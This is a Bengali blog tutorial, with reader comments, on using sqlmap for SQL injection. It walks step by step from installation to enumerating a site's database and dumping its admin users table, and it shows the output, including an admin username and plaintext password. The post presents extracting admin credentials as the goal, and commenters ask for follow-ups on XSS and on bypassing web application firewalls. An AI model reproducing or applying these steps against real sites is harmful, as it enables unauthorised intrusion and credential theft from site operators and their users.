Awesome! টিউনস
সকল Awesome! টিউনস

শিখে নিন Sqlmap in Bangla tutorial

3,414 দেখা 8 টিউমেন্টস জোসস
টিউন বিভাগ অল্টারিং
প্রকাশিত
Level 1

It specialist, Systech Trading, Dhaka
3 টিউনস 11 টিউমেন্টস 0 ফলোয়ার

SQLMap একটি ওপেন সোর্স Penetration Testing টুল।

ব্যাকট্রাক এবং ব্যাকবক্স অপারেটিং সিস্টেম এ এটি দেয়াই থাকে। এই অপারেটিং সিস্টেম ছাড়াও অন্য ওস এ এটি চালাতে পারবেন তবে তা ম্যানুয়ালি ডাউনলোড করে নিতে হবে।

ডাউনলোড করার জন্য Synaptic manager download –করে নিতে হবে, এরপর

এই ফাইলটি – Download  করে extract করুন।

 

Extracted ফোল্ডারের মধ্যে backtrack-tools নামে একটি ফাইল পাবেন, সেটি terminal এ রান করুন।

ফাইলটি executable করতে প্রথমে ফাইলটির properties এ যান।

permission tab এ click করুন এবার Execute এর ঘরে টিক দিয়ে ক্লোজ করুন।

 

এখন ফাইলটিতে double ক্লিক করুন Run in Terminal সিলেক্ট করুন।

ফাইলটি terminal এ রান হবে (password চাইলে password দিন)

backtrack এর সব রিপু আপডেট হয়ে যাবে 😀

এবার synaptic package manager ইন্সটল করা না থাকলে Software Center থেকে ইন্সটল করুন।

synaptic package manager রান করুন।

এখন সার্চ অপশন এ sqlmap লিখে সার্চ করুন। sqlmap পেয়ে যাবেন। ইন্সটল করুন।

ইন্সটল শেষে টার্মিনাল ওপেন করে টাইপ করুন

 

cd /opt/pentest/sqlmap [ sqlmap ফোল্ডারে যাওয়ার জন্য, আপনার sqlmap ফোল্ডার ভিন্ন হলে root ফোল্ডারে pentest এর মদ্ধে খুঁজে দেখুন, তারপর cd ফোল্ডার পাথ লিখুন ]

এরপর ধরি আমরা  www.example.com/ads.php?id=50 এই লিঙ্কটি টেস্ট করবো।

এই জন্য এক এক করে নিচের কোড গুলো দেখি …

 

python sqlmap.py -u http://www.example.com/ads.php?id=50

 

যদি লিঙ্কটি  vulnerable হয়

 

current database বের করবো

 

python ./sqlmap.py -u http://www.example.com/ads.php?id=50 –current-db

 

ধরি current database পেলাম  PressFreedom

 

এবার বের করতে হবে  tables

 

python ./sqlmap.py -u http://www.example.com/ads.php?id=50 –tables -D PressFreedom

 

 

Result :

 

Database: PressFreedom

 

[29 tables]

+——————–+

| Access_Contents    |

| Articles           |

| Back_Groups        |

| Back_Users_Groups  |

| Back_users         |

| Calendars          |

| Conferences        |

| Download_users     |

| Faqs               |

| Files              |

| Front_Groups       |

| Front_Users_Groups |

| Front_users        |

| Journalistes       |

| Links              |

| ListParticipants   |

| Listphotos         |

| Log                |

| Newsletters        |

| Pages_to_Pages     |

| Pays               |

| Photos             |

| Protest            |

| Rubriques_Pages    |

| Templates          |

| langues            |

| pagecontents       |

| pages              |

| rubriques          |

+——————–+

 

টেবিল গুলো পেয়ে গেলেন। এবার এডমিন টেবিল অনুমান করে তা থেকে এডমিন  তথ্য বের করতে হবে।

 

 

মনে করি  Back_users টেবিলে এডমিন ইনফো যেমন, এডমিন ইউজারনাম, পাসওয়ার্ড, ইমেইল ইত্যাদি আছে।

 

 

python ./sqlmap.py -u http://www.example.com/ads.php?id=50 –columns -T Back_users -D PressFreedom

 

 

Result :

 

Database: PressFreedom

Table: Back_users

[17 columns]

+—————-+————–+

| Column         | Type         |

+—————-+————–+

| BUSER_CP       | varchar(20)  |

| BUSER_EMAIL    | varchar(255) |

| BUSER_FAX      | varchar(20)  |

| BUSER_FONCTION | varchar(100) |

| BUSER_LOGIN    | varchar(255) |

| BUSER_NOM      | varchar(255) |

| BUSER_PASSWD   | varchar(255) |

| BUSER_PAYS     | varchar(200) |

| BUSER_PRENOM   | varchar(255) |

| BUSER_RUE      | varchar(255) |

| BUSER_SOCIETE  | varchar(255) |

| BUSER_TEL      | varchar(20)  |

| BUSER_VILLE    | varchar(255) |

| BUSER_WEBSITE  | varchar(255) |

| ID_BUSER       | bigint(20)   |

| ID_WAN         | varchar(20)  |

| LOGIN_OK       | char(1)      |

+—————-+————–+

 

এখন কলাম থেকে তথ্য বের ক নিচের মত করে লিখব…

 

python ./sqlmap.py -u http://www.example.com/ads.php?id=50 –columns -T Back_users -D PressFreedom –dump

 

এতে  সব এডমিন তথ্য বের হয়ে আসবে  …

 

 

Database: PressFreedom

Table: Back_users

[1 entry]

+——–+———-+———-+———-+———–+———–+———–+———–+————+————-+————-+————-+——————–+————–+—————+————

—+—————-+

| ID_WAN | ID_BUSER | LOGIN_OK | BUSER_CP | BUSER_RUE | BUSER_FAX | BUSER_TEL | BUSER_NOM | BUSER_PAYS | BUSER_EMAIL | BUSER_LOGIN | BUSER_VILLE | BUSER_PASSWD       | BUSER_PRENOM | BUSER_SOCIETE | BUSER_WEBSITE | BUSER_FONCTION |

+——–+———-+———-+———-+———–+———–+———–+———–+————+————-+————-+————-+——————–+————–+—————+————

—+—————-+

| ShiTao | 1        | 1        | NULL     | NULL      | NULL      | NULL      |    | NULL       | NULL        | ShiTao      | NULL        | press07!freedom20$ |       | NULL          | NULL          | NULL           |

+——–+———-+———-+———-+———–+———–+———–+———–+————+————-+————-+————-+——————–+————–+—————+—————+——-

ফেইসবুক এ আমাকে পেতে এখানে ক্লিক করুন

 

আমার ব্লগ

Level 1

আমি মিলটন মন্ডল। It specialist, Systech Trading, Dhaka। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 9 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 3 টি টিউন ও 11 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

টিউনস

আরও টিউনস

টিউনারের আরও টিউনস

টিউমেন্টস

Level 0

অনেক ভাল পোস্ট করলেন ভাই । কিন্তু এই ধারার আরও অনেক পোস্ট টেকটিউন তে করা হইসে । sql injection ছারাও নতুন অনেক মাধ্যম রয়েছে । আমরা আর কিছু শিখার আসা করি । পরবর্তী টিউন xss নিয়ে করবেন সেই অপেক্ষায় রইলাম ভাই ।

Level 1

ওকে ভাই। নেক্সট টাইমে xss নিয়ে টিউন করবো।

আপনার টিউমেন্ট এর জন্য থাঙ্কস @রেদওয়ান হোসেন

Level 0

@মিলটন ভাই , sqlmap দিয়ে wafbypass করার টিউন এর আপেক্ষায় রইলাম ।
। প্লিজ টিউন টা করবেন

Level 0

অনেক সুন্দর হইছে।next tune এর অপেক্ষায় রইলাম। আশা করি আর ভাল হবে।

Level 1

আজ সন্ধ্যায আমার পরবর্তী টিউন প্রকাশ করা হবে

Level 0

ধন্যবাদ শেয়ার করার জন্য

Level 0

Thank you
last er dike short a marlen 🙂